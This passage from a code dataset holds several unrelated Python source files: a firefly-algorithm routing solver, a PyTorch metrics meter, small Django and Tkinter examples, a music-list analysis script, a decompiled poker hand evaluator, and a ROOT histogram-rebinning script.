capa_dict[re.split(\"[/.]\", kwargs['bmark'])[1].strip('Osaba_')]\n    global coord, off_peak, peak, clustered_dem_ent\n    coord, forbidden, cluster, dem_ent, dem_rec = extract_xmldata(kwargs['bmark'])\n    off_peak, peak = make_costtable(forbidden)\n    customers_per_cluster = (len(coord)-1) // (len(cluster)-1)\n    tour = [[customers_per_cluster * i + j for j in range(1, customers_per_cluster+1)] for i in range(len(cluster)-1)]\n    clustered_dem_ent = [0 for i in range(len(cluster))]\n    for i, cluster in enumerate(tour):\n        for customer in cluster:\n            clustered_dem_ent[i+1] += dem_ent[customer]\n\n    swarm = [Firefly(tour, CAPACITY) for i in range(kwargs['f'])]\n    swarm = sorted(swarm, key = lambda swarm:swarm.luminosity)\n    best_firefly = copy.deepcopy(swarm[0])\n    # for fly in swarm:\n    #     if fly.luminosity < best_firefly.luminosity:\n    #         best_firefly = copy.deepcopy(fly)\n    if kwargs['p'] == 1:\n        print(\"Best firefly init: \", best_firefly.luminosity)\n    stag_count = 0\n    iteration = 0\n    NUM_CUSTOMER = len(coord)-1\n    start_time = time.time()\n\n    # print([s.luminosity for s in swarm])\n\n    while stag_count < (NUM_CUSTOMER+1/2*NUM_CUSTOMER*(NUM_CUSTOMER+1)):#the number of customers(N) + Σ(k=1, N)k\n    # while stag_count < NUM_CUSTOMER*10:\n        time1 = time.time()\n        for i in range(kwargs['f']):\n            for j in range(kwargs['f']):\n                if swarm[j].luminosity < swarm[i].luminosity:\n                    # new_tour, new_tour2routes = insertion_function(swarm[i], swarm[j], kwargs['g'], iteration)\n                    new_tour, new_tour2routes = beta_step(swarm[i], swarm[j], kwargs['g'], kwargs['dlt'])\n                    swarm[i].update(new_tour, new_tour2routes)\n                    if kwargs['v'] == 1:\n                        new_tour, new_tour2routes = alpha_step1(swarm[i], kwargs['a'])\n                    elif kwargs['v'] == 2:\n                        new_tour, new_tour2routes = alpha_step2(swarm[i], kwargs['a'])\n                    elif kwargs['v'] == 4:\n                        new_tour, new_tour2routes = alpha_step4(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n                    else:\n                        new_tour, new_tour2routes = alpha_step5(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n                    swarm[i].update(new_tour, new_tour2routes)\n        swarm = sorted(swarm, key = lambda swarm:swarm.luminosity)\n        if swarm[0].luminosity == swarm[-1].luminosity: #all firefly at the same point\n            if kwargs['p'] == 1:\n                print(\"*** swarm blocked ***\")\n            for i in range(1, len(swarm)):\n                if kwargs['v'] == 1:\n                    new_tour, new_tour2routes = alpha_step1(swarm[i], kwargs['a'])\n                elif kwargs['v'] == 2:\n                    new_tour, new_tour2routes = alpha_step2(swarm[i], kwargs['a'])\n                elif kwargs['v'] 
== 4:\n new_tour, new_tour2routes = alpha_step4(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n else:\n new_tour, new_tour2routes = alpha_step5(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n swarm[i].update(new_tour, new_tour2routes)\n swarm = sorted(swarm, key = lambda swarm:swarm.luminosity)\n time2 = time.time()\n if swarm[0].luminosity < best_firefly.luminosity:\n best_firefly = copy.deepcopy(swarm[0])\n stag_count = 0\n else:\n stag_count += 1\n # for fly in swarm:\n # if fly.luminosity < best_firefly.luminosity:\n # best_firefly = copy.deepcopy(fly)\n # stag_count = 0\n # stag_count += 1\n if iteration % 100 == 0:\n if kwargs['p'] == 1:\n print(\"\")\n print(\"Iteration: \", iteration)\n print(\"Swarm: \", [s.luminosity for s in swarm])\n print(\"Best firefly: \", best_firefly.luminosity)\n # for fly in swarm:\n # print(fly.routes)\n # print(fly.luminosity)\n # with open('{}'.format(kwargs['fname']), 'a') as f:\n # f.write(\"i:{}\\t{}\\n\".format(iteration, best_firefly.luminosity))\n iteration += 1\n # print(\"time2-1: {}\".format(time2 - time1))\n # print(\"time3-2: {}\".format(time3 - time2))\n end_time = time.time()\n print(\"Elapsed time: {}\\n\".format(end_time - start_time))\n # with open(\"{}\".format(kwargs['fname']), 'a') as f:\n # f.write(\"routes: {}\\n\".format(best_firefly.routes))\n # with open(\"{}\".format(kwargs['fname']), 'a') as f:\n # f.write(\"Elapsed time: {}\\n\\n\".format(end_time - start_time))\n\n return best_firefly\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-bmark', type = str, default = \"Osaba_data/Osaba_50_1_1.xml\", help = \"benchmark xml_file name\")\n parser.add_argument('-f', type = int, default = 100, help = \"the number of firefly\")\n parser.add_argument('-a', type = int, default = 1, help = \"alpha step parameter\")\n parser.add_argument('-g', type = float, default = 0.90, help = \"insert customer rate\")\n parser.add_argument('-dlt', type = float, default = 1.0, help = \"insert cluster rate\")\n parser.add_argument('-v', type = int, default = 1, help = \"alpha step version\")\n parser.add_argument('-p', type = int, default = 1, help = \"vorbose information\")\n parser.add_argument('-fname', type = str, default = 'vrp/result', help = \"save file name\")\n parser.add_argument('-s', type = int, default = 1, help = \"segment decrease rate\")\n parser.add_argument('-sch', type = str, default = 'linear', help = \"segment decrease schedule\")\n args = parser.parse_args()\n\n\n # cProfile.run('firefly_algorithm(bmark=args.bmark, f=args.f, a=args.a, g=args.g, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname)', sort='time')\n\n if os.path.exists('{}'.format(args.fname)):\n if confirm_input(args.fname):\n with open('{}'.format(args.fname), 'w') as f:\n print(\"clear previous text\")\n with open('{}'.format(args.fname), 'a') as f:\n f.write(\"random: -g={}, -a={}, -f={}\\n\".format(args.g, args.a, args.f))\n\n # while(True):\n # aparam = np.random.randint(1,8)\n # gparam = (0.01-0.00001)*np.random.rand()+0.00001\n # fparam = np.random.randint(20,80)\n # with open('{}'.format(args.fname), 'a') as f:\n # f.write('-a={}, -g={}, -f={}\\n'.format(aparam, gparam, fparam))\n # firefly = firefly_algorithm(bmark=args.bmark, f=fparam, a=aparam, g=gparam, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname)\n # luminositys=[]\n # for i in range(10):\n # firefly = firefly_algorithm(bmark=args.bmark, f=args.f, a=args.a, g=args.g, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname, 
s=args.s, sch=args.sch)\n # luminositys.append(firefly.luminosity)\n # with open(\"{}\".format(kwargs['fname']), 'a') as f:\n # f.write(\"mean: {}\\n\".format(np.mean(luminositys)))\n # f.write(\"std: {}\".format(np.std(luminositys)))\n firefly = firefly_algorithm(bmark=args.bmark, f=args.f, a=args.a, g=args.g, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname, s=args.s, sch=args.sch)\n # print(firefly.luminosity)\n print(firefly.routes)\n #\n # with open('{}'.format(args.fname), 'a') as f:\n # f.write(\"{}\\n\\n\".format(firefly.routes))\n # print(customers)\n\n\n # print(coord)\n # a = [1,5,3,2,4,1,6,6,3,3,3,3,3,3]\n # b = [1,5,2,6,3,1,6,5,5,5,5,5,5,5]\n # print(beta_step(a,b,1,0.95,1))\n","sub_path":"master/scripts/planner/solvers/vrp_firefly.py","file_name":"vrp_firefly.py","file_ext":"py","file_size_in_byte":22681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"67018685","text":"\"\"\"\nCopyright (c) Facebook, Inc. and its affiliates.\n\nThis source code is licensed under the MIT license found in the\nLICENSE file in the root directory of this source tree.\n\"\"\"\n\n# THIS IS NOW DEPRECATED. Consider using ocpmodels.modules.evaluator instead.\nfrom collections import defaultdict, deque\n\nimport torch\n\n# from github.com/facebookresearch/pythia/blob/12f67cd4f67499814bb0b3665ff14dd635800f63/pythia/common/meter.py\nfrom ocpmodels.common import distutils\n\n\nclass SmoothedValue:\n \"\"\"Track a series of values and provide access to smoothed values over a\n window or the global series average.\n \"\"\"\n\n def __init__(self, window_size=20):\n self.window_size = window_size\n self.reset()\n\n def reset(self):\n self.deque = deque(maxlen=self.window_size)\n self.series = []\n self.total = 0.0\n self.count = 0\n\n def update(self, value):\n self.deque.append(value)\n self.series.append(value)\n self.count += 1\n self.total += value\n\n @property\n def median(self):\n d = torch.tensor(list(self.deque))\n return d.median().item()\n\n @property\n def avg(self):\n d = torch.tensor(list(self.deque))\n return d.mean().item()\n\n @property\n def global_avg(self):\n return self.total / self.count\n\n def get_latest(self):\n return self.deque[-1]\n\n def all_reduce(self, device):\n print(\"Total\", self.total)\n self.total = distutils.all_reduce(self.total, device=device)\n self.count = distutils.all_reduce(self.count, device=device)\n series_list = distutils.all_gather(self.series, device=device)\n self.series = list(zip(series_list))\n deque_list = distutils.all_gather(self.deque, device=device)\n self.deque = deque(list(zip(deque_list)), maxlen=self.window_size)\n\n\nclass Meter:\n def __init__(self, delimiter=\", \", split=\"train\"):\n self.meters = defaultdict(SmoothedValue)\n self.delimiter = delimiter\n self.split = split\n\n def update(self, update_dict):\n for k, v in update_dict.items():\n if isinstance(v, torch.Tensor):\n if v.dim() != 0:\n v = v.mean()\n v = v.item()\n assert isinstance(v, (float, int))\n self.meters[k].update(v)\n\n def update_from_meter(self, meter):\n for key, value in meter.meters.items():\n assert isinstance(value, SmoothedValue)\n self.meters[key] = value\n\n def __getattr__(self, attr):\n if attr in self.meters:\n return self.meters[attr]\n if attr in self.__dict__:\n return self.__dict__[attr]\n raise AttributeError(\n \"'{}' object has no attribute '{}'\".format(\n type(self).__name__, attr\n )\n )\n\n def get_scalar_dict(self):\n scalar_dict = {}\n for k, v in self.meters.items():\n scalar_dict[k] = 
v.global_avg\n        return scalar_dict\n\n    def all_reduce(self, device):\n        for v in self.meters.values():\n            v.all_reduce(device)\n\n    def __str__(self):\n        loss_str = []\n        for name, meter in self.meters.items():\n            # Regardless of split, if \"epoch\" or \"step\", print latest.\n            if \"epoch\" in name or \"step\" in name:\n                loss_str.append(\"{}: {:.4f}\".format(name, meter.get_latest()))\n            # If training split, print mean over the past window_size points.\n            elif \"train\" in self.split:\n                loss_str.append(\"{}: {:.4f}\".format(name, meter.avg))\n            # If val / test splits, print global average over the entire split.\n            elif \"val\" in self.split or \"test\" in self.split:\n                loss_str.append(\"{}: {:.4f}\".format(name, meter.global_avg))\n            else:\n                raise NotImplementedError\n\n        return self.delimiter.join(loss_str)\n\n\ndef mae(prediction, target):\n    \"\"\"\n    Computes the mean absolute error between prediction and target\n\n    Parameters\n    ----------\n\n    prediction: torch.Tensor (N, 1)\n    target: torch.Tensor (N, 1)\n    \"\"\"\n    return torch.mean(torch.abs(target - prediction), dim=0)\n\n\ndef mae_ratio(prediction, target):\n    \"\"\"\n    Computes the mean absolute error between prediction and target\n    divided by the absolute values of target\n\n    Parameters\n    ----------\n\n    prediction: torch.Tensor (N, T)\n    target: torch.Tensor (N, T)\n    \"\"\"\n    return torch.mean(\n        torch.abs(target - prediction) / (torch.abs(target) + 1e-7), dim=0\n    )\n\n\ndef mean_l2_distance(prediction, target):\n    \"\"\"\n    Computes the mean atomic distances\n\n    Parameters\n    ----------\n\n    prediction: torch.Tensor (N, 3)\n    target: torch.Tensor (N, 3)\n\n    Return\n    ----------\n    avg distance: (N,1)\n    \"\"\"\n    dist = torch.sqrt(torch.sum((target - prediction) ** 2, dim=1))\n    return torch.mean(dist)\n","sub_path":"ocpmodels/common/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"31299319","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import Item\n\n\nclass ItemAdmin(admin.ModelAdmin):\n\tlist_display=[\"title\", \"image\", \"price\", \"discount\"]\n\tclass Meta:\n\t\tmodel = Item\n\nadmin.site.register(Item,ItemAdmin)","sub_path":"src/items/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"566476435","text":"#tk_helloworld.py\n#Tkinter library import\nimport tkinter as tk\n\ndef event():\n    i=1\n    new_label=tk.Label(root,text=str(i))\n    new_label.pack()\n\n    \n#make Tk instance\nroot= tk.Tk()\n\n#a Tk() instance is the top-level window (frame) that widgets attach to\n#size of window\nroot.geometry(\"400x200\")\nlabel=tk.Label(root,text='Hello World!',background=\"green\")\n#root is the display surface of the Tk instance\n#layout of label\nlabel.pack()\n#button\nbutton=tk.Button(root,text='Push Button1',command=event)\nbutton.pack()\n#start the event loop so the window is shown and stays responsive\nroot.mainloop()\n","sub_path":"tk_helloworld.py","file_name":"tk_helloworld.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
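The event handler in tk_helloworld.py always shows "1" because i is reset on every click. A common variant keeps a running counter; a minimal hypothetical sketch (not from the source):

import tkinter as tk

root = tk.Tk()
count = tk.IntVar(value=0)  # Tk variable survives between callbacks

def on_click():
    count.set(count.get() + 1)
    tk.Label(root, text=str(count.get())).pack()

tk.Button(root, text='Push Button1', command=on_click).pack()
root.mainloop()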
+{"seq_id":"415139673","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis file contains the global URL settings: the URL addresses a user can enter and the views\nassociated with them that are called for a given URL. The urlpatterns variable describes \naddresses and views in the form: \n    a regular expression matched by the URL, the view, additional arguments.\n\"\"\"\n\nfrom django.conf.urls.defaults import *\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    (r'^css/(?P.*)$', 'django.views.static.serve', {'document_root': 'media/css'}),\n    (r'^js/(?P.*)$', 'django.views.static.serve', {'document_root': 'media/js'}),\n    (r'^gfx/(?P.*)$','django.views.static.serve', {'document_root': 'media/gfx'}),\n    (r'^$', 'accounts.views.index'),\n    (r'^$/', 'accounts.views.index'),\n    (r'^admin/(.*)', admin.site.root),\n    (r'^accounts/', include('accounts.urls')),\n    (r'^friends/',include('friends.urls')),\n    (r'^files/',include('files.urls')),\n)\n","sub_path":"Source/ass8_portal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"365052671","text":"import csv\nimport matplotlib.pyplot as plt\nimport json\n\n\nwith open('./data.csv') as f:\n    # we are using DictReader because we want our information to be in dictionary format.\n    reader = csv.DictReader(f)\n    # some more code\n    rolling_list = []\n    for i in reader:\n        rolling_list.append(i)\n    print(rolling_list)\n\n\ndef find_by_name(album_name):\n    for hit in rolling_list:\n        if hit[\"album\"] == album_name:\n            return hit\n\ndef find_by_rank(album_rank):\n    for hit in rolling_list:\n        if hit[\"number\"] == str(album_rank):\n            return hit\n    \ndef find_by_year(year):\n    album_list = []\n    for hit in rolling_list:\n        if hit[\"year\"] == str(year):\n            album_list.append(hit)\n    return album_list\n\ndef find_by_years(start_year, end_year):\n    album_by_years = []\n    start = start_year\n    while start <= end_year:\n        album_by_years.extend(find_by_year(start))\n        start += 1\n    return album_by_years\n\n\ndef find_by_ranks(start_rank, end_rank):\n    album_by_ranks = []\n    start = start_rank\n    while start <= end_rank:\n        album_by_ranks.append(find_by_rank(start))\n        start += 1\n    return album_by_ranks\n\ndef all_titles():\n    titles_list = []\n    for hit in rolling_list:\n        titles_list.append(hit['album'])\n    return titles_list\n    \ndef all_artists():\n    artists_list = []\n    for hit in rolling_list:\n        artists_list.append(hit['artist'])\n    return artists_list\n\n# def artist_most_hits():\n#     max_count = 0\n#     artist = None\n#     artists_list = all_artists()\n#     artists_set = set(artists_list)\n#     for singer in artists_set:\n#         temp_count = artists_list.count(singer)\n#         if temp_count >= max_count:\n#             max_count = temp_count\n#             artist = singer\n#     return artist\n\ndef artist_most_hits():\n    artists_list = all_artists()\n    return max(artists_list, key=artists_list.count)\n\ndef popular_word():\n    word_dict = {}\n    titles_list = all_titles()\n    for title in titles_list:\n        for word in title.split():\n            if word in word_dict:\n                word_dict[word] +=1 \n            else:\n                word_dict[word] = 1\n    max_count = 0\n    max_word = None\n    for word in word_dict:\n        if word_dict[word] >= max_count:\n            max_count = word_dict[word]\n            max_word = word\n    return max_word\n    \ndef histogram_of_album_by_decade():\n    plt.hist([int(hit[\"year\"]) for hit in rolling_list], bins=6)\n    \ndef histogram_by_genre():\n    fig_size = plt.figure(figsize=(50, 20))\n    genre_list = []\n    for hit in [album['genre'] for album in rolling_list]:\n        if type(hit.split(\",\")) == list:\n            for genre in hit.split(\",\"):\n                genre = genre.rstrip().lstrip()\n                genre_list.append(genre)\n        else:\n            genre_list.append(hit.rstrip().lstrip())\n    plt.hist(genre_list, bins=14)\n\n# part 2\n\n
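popular_word builds its frequency table by hand; the standard library's collections.Counter expresses the same counting idiom in two lines. A sketch (illustrative, not from the source):

from collections import Counter

def popular_word_counter(titles):
    # count every whitespace-separated word across all titles
    words = Counter(w for t in titles for w in t.split())
    return words.most_common(1)[0][0] if words else None

assert popular_word_counter(["Let It Be", "Let It Bleed"]) in ("Let", "It")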
text_file = open('top-500-songs.txt', 'r')\n    # read each line of the text file\n    # here is where you can print out the lines to your terminal and get an idea \n    # for how you might think about re-formatting the data\nlines = text_file.readlines()\nprint(lines)\n\ndef reformat_text_file():\n    reformatted = []\n    for line in lines:\n        reformatted.append(line.strip('\\n').split('\\t'))\n    return reformatted\n\ndef reformat_to_dict():\n    lst = reformat_text_file()\n    category = [\"rank\", 'name', 'artist', 'year']\n    album_lst = []\n    albums_dict = {\"rank\": None, 'name':None, 'artist':None,'year':None}\n    for item in lst:\n        for ind in range(len(item)):\n            albums_dict[category[ind]] = item[ind]\n        album_lst.append(albums_dict.copy())\n    return album_lst\n    \n    \nfile = open('track_data.json', 'r')\njson_data = json.load(file)\n\ndef find_by_name_refactored(data, term, album_name):\n    for hit in data:\n        if hit[term] == album_name:\n            return hit\n\ndef find_by_rank_refactored(data, album_rank, term=\"rank\"):\n    # term defaults to \"rank\", matching the keys produced by reformat_to_dict,\n    # so callers that only pass (data, rank) still work\n    for hit in data:\n        if hit[term] == str(album_rank):\n            return hit\n    \ndef find_by_year_refactored(data, year):\n    album_list = []\n    for hit in data:\n        if hit[\"year\"] == str(year):\n            album_list.append(hit)\n    return album_list\n\ndef find_by_years_refactored(data, start_year, end_year):\n    album_by_years = []\n    start = start_year\n    while start <= end_year:\n        album_by_years.extend(find_by_year_refactored(data, start))\n        start += 1\n    return album_by_years\n\n\ndef find_by_ranks_refactored(data, start_rank, end_rank):\n    album_by_ranks = []\n    start = start_rank\n    while start <= end_rank:\n        album_by_ranks.append(find_by_rank_refactored(data, start))\n        start += 1\n    return album_by_ranks\n\ndef all_titles_refactored(data, term):\n    titles_list = []\n    for hit in data:\n        titles_list.append(hit[term])\n    return titles_list\n    \ndef all_artists_refactored(data):\n    artists_list = []\n    for hit in data:\n        artists_list.append(hit['artist'])\n    return artists_list\n\n# def artist_most_hits():\n#     max_count = 0\n#     artist = None\n#     artists_list = all_artists()\n#     artists_set = set(artists_list)\n#     for singer in artists_set:\n#         temp_count = artists_list.count(singer)\n#         if temp_count >= max_count:\n#             max_count = temp_count\n#             artist = singer\n#     return artist\n\ndef artist_most_hits_refactored(data):\n    return max(all_artists_refactored(data), key=all_artists_refactored(data).count)\n\ndef popular_word_refactored(data, term):\n    word_dict = {}\n    titles_list = all_titles_refactored(data, term)\n    for title in titles_list:\n        for word in title.split():\n            if word in word_dict:\n                word_dict[word] +=1 \n            else:\n                word_dict[word] = 1\n    max_count = 0\n    max_word = None\n    for word in word_dict:\n        if word_dict[word] >= max_count:\n            max_count = word_dict[word]\n            max_word = word\n    return max_word\n    \ndef histogram_of_album_by_decade_refactored(data):\n    plt.hist([int(hit[\"year\"]) for hit in data], bins=6)\n    \ndef artist_with_top_500_songs(data, songs_data):\n    artist_count = {}\n    for hit in data:\n        key = (hit[\"artist\"], hit[\"album\"])\n        for song in hit[\"tracks\"]: \n            if song in all_titles_refactored(songs_data, \"name\") and key in artist_count:\n                artist_count[key] += 1\n            elif song in all_titles_refactored(songs_data, \"name\"):\n                artist_count[key] = 1\n    return artist_count\n\ndef albumWithMostTopSongs(data, songs_data):\n    counts = artist_with_top_500_songs(data, songs_data)\n    # pick the (artist, album) key with the highest count, not the maximum key itself\n    return max(counts, key=counts.get)\n\ndef albumsWithTopSongs(data, songs_data):\n    albums_lst = []\n    for pair in artist_with_top_500_songs(data, songs_data):\n        albums_lst.append(pair[1])\n    return albums_lst\n    
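A quick usage sketch of the parameterized finders above, assuming json_data entries carry 'artist', 'album', 'year' and 'tracks' keys as artist_with_top_500_songs implies (the sample records below are hypothetical, not from the data files):

albums = [{"artist": "The Beatles", "album": "Revolver", "year": "1966",
           "tracks": ["Taxman", "Eleanor Rigby"]}]
songs = [{"rank": "1", "name": "Eleanor Rigby", "artist": "The Beatles", "year": "1966"}]

print(find_by_name_refactored(albums, "album", "Revolver"))   # the Revolver record
print(find_by_year_refactored(albums, 1966))                  # [the Revolver record]
print(artist_with_top_500_songs(albums, songs))               # {('The Beatles', 'Revolver'): 1}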
\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"603838111","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/poker/poker.py\n# Compiled at: 2014-04-28 18:35:26\n__doc__ = '\\nThis module provides functions for comparing seven card\\npoker hands and holdem hands. Note that several lookup\\ntables are immediately build on import to increase performance\\nby eliminating the dot notation of classes.\\n\\nIt includes a 30 MB lookup table which allows approximately\\na 4 times speed increase for holdem2p() over poker_lite.holdem2p().\\n\\nThe hash scheme for the lookup table was inspired by the specialK hand\\nevaluator blog:\\nhttp://specialk-coding.blogspot.com/2010/04/texas-holdem-7-card-evaluator_23.html\\nThe table is populated by the poker_lite.handvalue function.\\n'\nimport itertools, poker_lite, utils\nfrom poker_lite import _IS_FLUSH, _BITS, CARD_MASK\n_SPECIALKS = (0, 1, 5, 22, 98, 453, 2031, 8698, 22854, 83661, 262349, 636345, 1479181)\n_SUITSHIFT = 23\n_RANKMASK = 8388607\n_DECK = [ _r | _s << _SUITSHIFT for _r in _SPECIALKS for _s in (0, 1, 8, 57) ]\n\ndef _ranks_combos():\n for i in xrange(13):\n for j in xrange(i, 13):\n for k in xrange(j, 13):\n for l in xrange(k, 13):\n for m in xrange(l, 13):\n if i == j == k == l == m:\n continue\n for n in xrange(m, 13):\n if j == k == l == m == n:\n continue\n for o in xrange(n, 13):\n if k == l == m == n == o:\n continue\n yield (\n i, j, k, l, m, n, o)\n\n\ndef _build_ranktable():\n ranktable = {}\n offsuits = (i % 4 for i in xrange(1000000))\n for hand in _ranks_combos():\n key = sum(_SPECIALKS[i] for i in hand)\n offhand = [ r * 4 + next(offsuits) for r in hand ]\n val = poker_lite.handvalue(offhand)\n ranktable[key] = val\n\n return ranktable\n\n\ndef _build_suittable():\n flushtable = {}\n for hand, value in enumerate(poker_lite._FLUSH_TABLE):\n if not value:\n continue\n flushtable[hand] = poker_lite.SF | value if poker_lite._STRAIGHT_TABLE[hand] else poker_lite.FLUSH | value\n\n return flushtable\n\n\n_FLUSH_TABLE = _build_suittable()\n_RANK_TABLE = _build_ranktable()\n\ndef handvalue(hand, val=0, computed_cards=[]):\n \"\"\"Return a value of a seven card hand which can be\n compared to the handvalue value of any other hand to\n see if it is better worse or equal.\n\n Only supply the hand. 
The other kwargs are for internal\n use and efficiency\"\"\"\n deck = _DECK\n for c in hand:\n val += deck[c]\n\n if _IS_FLUSH[(val >> _SUITSHIFT)] != -1:\n flush = 0\n for c in hand + computed_cards:\n flush += _BITS[c]\n\n flush >>= _IS_FLUSH[(val >> _SUITSHIFT)]\n flush &= CARD_MASK\n return _FLUSH_TABLE[flush]\n return _RANK_TABLE[(val & _RANKMASK)]\n\n\ndef compare(h1, h2):\n \"\"\"Return an integer representing the winner of two\n seven card hands.\n 0 -> h1 wins\n 1 -> h2 wins\n 2 -> tie\"\"\"\n r1 = handvalue(h1)\n r2 = handvalue(h2)\n if r1 > r2:\n return 0\n else:\n if r2 > r1:\n return 1\n return 2\n\n\ndef holdem2p(h1, h2, board):\n \"\"\"Return an integer representing the winner of two\n holdem hands and a board.\n 0 -> h1 wins\n 1 -> h2 wins\n 2 -> tie\"\"\"\n deck = _DECK\n val = 0\n for c in board:\n val += deck[c]\n\n c1, c2 = h1\n v1 = val + deck[c1] + deck[c2]\n if _IS_FLUSH[(v1 >> _SUITSHIFT)] != -1:\n flush = _BITS[c1] + _BITS[c2]\n for c in board:\n flush += _BITS[c]\n\n flush >>= _IS_FLUSH[(v1 >> _SUITSHIFT)]\n flush &= CARD_MASK\n v1 = _FLUSH_TABLE[flush]\n else:\n v1 = _RANK_TABLE[(v1 & _RANKMASK)]\n c1, c2 = h2\n v2 = val + deck[c1] + deck[c2]\n if _IS_FLUSH[(v2 >> _SUITSHIFT)] != -1:\n flush = _BITS[c1] + _BITS[c2]\n for c in board:\n flush += _BITS[c]\n\n flush >>= _IS_FLUSH[(v2 >> _SUITSHIFT)]\n flush &= CARD_MASK\n v2 = _FLUSH_TABLE[flush]\n else:\n v2 = _RANK_TABLE[(v2 & _RANKMASK)]\n if v1 > v2:\n return 0\n if v2 > v1:\n return 1\n return 2\n\n\n_schemes2p = [\n [\n 0], [1], [0, 1]]\n\ndef multi_holdem(hands, board):\n \"\"\"Return a list indices representing hands that win or tie.\"\"\"\n if len(hands) == 2:\n return _schemes2p[holdem2p(hands[0], hands[1], board)]\n deck = _DECK\n boardval = 0\n for c in board:\n boardval += deck[c]\n\n results = []\n best = 0\n for i, h in enumerate(hands):\n v = handvalue(h, boardval, board)\n if v > best:\n results = [\n i]\n best = v\n elif v == best:\n results.append(i)\n\n return results\n\n\ndef monte_carlo(hands, trials=100000):\n \"\"\"\n Return ev of each player.\n\n hands -> list of 2 - 22 hands\n trials -> the approximate number of simulations to run\n \"\"\"\n nplayers = len(hands)\n wins = [ 0 for __ in range(nplayers) ]\n nboards = (52 - nplayers * 2) / 5\n scheme = [5] * nboards\n deck = utils.Deck(sum(hands, []))\n for t in xrange(trials / nboards):\n for b in deck.deal(scheme):\n winners = multi_holdem(hands, b)\n nwinners = len(winners)\n for w in winners:\n wins[w] += 1.0 / nwinners\n\n trials = trials / nboards * nboards\n return [ w / trials for w in wins ]\n\n\ndef full_enumeration(hands, board=[]):\n \"\"\"\n Return ev of each player.\n\n hands -> list of two card hands\n board -> any # of cards 0-5.\n \"\"\"\n nplayers = len(hands)\n if nplayers == 2:\n return enum2p(hands[0], hands[1], board)\n if nplayers == 1:\n return [1.0]\n wins = [ 0 for __ in range(nplayers) ]\n trials = 0\n dead = sum(hands, board)\n deck = utils.Deck(dead)\n needed_cards = 5 - len(board)\n for cards in itertools.combinations(deck, needed_cards):\n winners = multi_holdem(hands, board + list(cards))\n nwinners = len(winners)\n trials += 1\n for w in winners:\n wins[w] += 1.0 / nwinners\n\n return [ w / trials for w in wins ]\n\n\ndef enum2p(h1, h2, board=[]):\n \"\"\"\n Return ev of each player.\n\n hands -> list of two card hands\n board -> any # of cards 0-5.\n \"\"\"\n wins = [\n 0, 0, 0]\n dead = h1 + h2 + board\n deck = utils.Deck(dead)\n needed_cards = 5 - len(board)\n for cards in itertools.combinations(deck, 
needed_cards):\n winners = holdem2p(h1, h2, board + list(cards))\n wins[winners] += 1\n\n ev1 = (wins[0] + 0.5 * wins[2]) / sum(wins)\n return [\n ev1, 1.0 - ev1]","sub_path":"pycfiles/pol-0.4.1.tar/poker.py","file_name":"poker.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"198267191","text":"import numpy as np\nimport ROOT as R\n\nfrom prod_util import dets_for_phase, stage2_pbp_path\nfrom prod_util import fit_hist_ibd_path, fit_hist_acc_path\n\nnbins_lbnl = 37\nnbins_fine = 240\n\n\ndef binning_lbnl():\n edges = np.concatenate([[0.7],\n np.arange(1, 8, 0.2),\n [8, 12]])\n assert len(edges) == 1 + nbins_lbnl\n return edges\n\n\n# We don't actually need this since stage2 gives us this binning already\ndef binning_fine():\n return np.linspace(0, 12, 1 + nbins_fine)\n\n\ndef gen_hists_(phase, tag, config):\n path_ibd = fit_hist_ibd_path(phase, tag, config)\n path_acc = fit_hist_acc_path(phase, tag, config)\n f_ibd = R.TFile(path_ibd, 'RECREATE')\n f_acc = R.TFile(path_acc, 'RECREATE')\n\n for site in [1, 2, 3]:\n path_in = stage2_pbp_path(site, phase, tag, config)\n f = R.TFile(path_in)\n\n # fitter expects all 8 dets in the file, even in 6/7AD periods\n for det in dets_for_phase(site, 2): # phase 2 = 8AD\n h_ibd = f.Get(f'h_ibd_AD{det}')\n h_acc = f.Get(f'h_single_AD{det}')\n\n name_ibd_lbnl = f'h_ibd_eprompt_inclusive_eh{site}_ad{det}'\n name_ibd_fine = f'h_ibd_eprompt_fine_inclusive_eh{site}_ad{det}'\n name_acc_lbnl = f'h_accidental_eprompt_inclusive_eh{site}_ad{det}'\n name_acc_fine = f'h_accidental_eprompt_fine_inclusive_eh{site}_ad{det}'\n\n if h_ibd:\n h_ibd_lbnl = h_ibd.Rebin(nbins_lbnl, name_ibd_lbnl,\n binning_lbnl())\n h_ibd_fine = h_ibd.Rebin(nbins_fine, name_ibd_fine,\n binning_fine())\n h_acc_lbnl = h_acc.Rebin(nbins_lbnl, name_acc_lbnl,\n binning_lbnl())\n h_acc_fine = h_acc.Rebin(nbins_fine, name_acc_fine,\n 